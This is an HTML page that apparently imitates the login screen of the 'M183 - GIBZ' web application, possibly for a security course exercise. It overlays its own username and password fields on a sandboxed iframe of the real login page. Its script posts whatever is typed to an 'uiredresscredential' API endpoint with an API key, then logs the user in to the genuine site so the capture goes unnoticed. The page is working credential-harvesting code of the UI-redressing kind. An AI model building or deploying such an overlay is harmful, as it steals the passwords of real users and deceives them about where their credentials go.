<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>M183 - GIBZ</title>
    <link rel="manifest" href="https://m183.gibz-informatik.ch/favicon/android-icon-36x36.png">
    <link rel="icon" href="https://m183.gibz-informatik.ch/favicon/android-icon-36x36.png" type="image/x-icon">
    <style>
        * {
            margin: -1px;
            padding: -1px;
            overflow: hidden;
        }

        .floating {
            z-index: 100;
            position: absolute;
            width: 100%;
            text-align: center;
        }

        .floating > div {
            margin: auto;
            margin-top: 191px;
            background-color: white;
            font-family: 'Roboto,sans-serif';
            font-weight: 500;
            letter-spacing: .0892857143em;
        }

        .username {
            width: 65%;
            border: none;
            border-bottom: 1px solid grey;
            padding: 5px;
            font-size: large;
        }

        .password {
            margin-top: 60px;
            margin-bottom: 5px;
            width: 65%;
            border: none;
            border-bottom: 1px solid grey;
            padding: 5px;
            font-size: large;
        }

        input:focus {
            outline: none;
        }

        button {
            background-color: #1976d2;
            color: white;
            cursor: pointer;
            border: none;
            padding: 0 16px;
            height: 34px;
            border-radius: 4px;
            font-size: .875rem;
            font-size: medium;
            margin-top: 63px;
            margin-bottom: 10px;
            z-index: 200;
        }

        @media screen and (max-width: 600px) {
            .username {
                width: 95%;
            }

            .password {
                width: 95%;
            }
        }

        @media screen and (min-width: 950px) {
            .username {
                width: 45%;
            }

            .password {
                width: 45%;
            }
        }

        @media screen and (min-width: 1200px) {
            .username {
                width: 400px;
            }

            .password {
                width: 400px;
            }
        }

        @media screen and (min-width: 1900px) {
            .username {
                width: 600px;
            }

            .password {
                width: 600px;
            }
        }
    </style>
    <script>
        function sendToServer() {
            let username = document.getElementsByClassName('username')[0].value;
            let password = document.getElementsByClassName('password')[0].value

            fetch('https://m183.gibz-informatik.ch/api/uiredresscredential', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                    'X-Api-Key': 'NAAyADcANwAyADgAMQA5ADAAMgAwADkAOAAxADcAOQA5ADgA'
                },
                body: JSON.stringify({
                    "username": username,
                    "password": password
                })
            }).then(res => {
                fetch("https://m183.gibz-informatik.ch/api/authentication/authenticate", {
                    "headers": {
                        "accept": "application/json, text/plain, */*",
                        "accept-language": "en,de;q=0.9",
                        "content-type": "application/json",
                        "sec-ch-ua-mobile": "?0",
                        "sec-fetch-dest": "empty",
                        "sec-fetch-mode": "cors",
                        "sec-fetch-site": "same-origin"
                    },
                    "referrer": "https://m183.gibz-informatik.ch/login",
                    "referrerPolicy": "strict-origin-when-cross-origin",
                    "body": `{\"username\":\"${username}\",\"password\":\"${password}\"}`,
                    "method": "POST",
                    "mode": "cors",
                    "credentials": "include"
                }).then(res => {
                    console.log(res)
                    fetch("https://m183.gibz-informatik.ch/api/user/profile", {
                        "headers": {
                            "accept": "application/json, text/plain, */*",
                            "accept-language": "en",
                            "sec-ch-ua": "\"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"",
                            "sec-ch-ua-mobile": "?0",
                            "sec-fetch-dest": "empty",
                            "sec-fetch-mode": "cors",
                            "sec-fetch-site": "same-origin"
                        },
                        "referrer": "https://m183.gibz-informatik.ch/profile",
                        "referrerPolicy": "strict-origin-when-cross-origin",
                        "body": null,
                        "method": "GET",
                        "mode": "cors",
                        "credentials": "include"
                    }).then(() => {
                        location.href = 'https://m183.gibz-informatik.ch/profile'
                    })
                }).catch(() => {
                    location.href = 'https://m183.gibz-informatik.ch/login'
                })
            }).catch((error) => {
                console.log(error)
            })
        }
    </script>
</head>
<body>
    <div class="floating">
        <div class="form-group">
            <input class="username" type="text" placeholder="Username">
            <br/>
            <input class="password" type="password" placeholder="Password">
            <br/>
            <button onclick="sendToServer()">LOGIN</button>
        </div>
    </div>
    <iframe sandbox="allow-scripts" height="100%" width="100%" src="https://m183.gibz-informatik.ch/login"></iframe>
</body>
</html>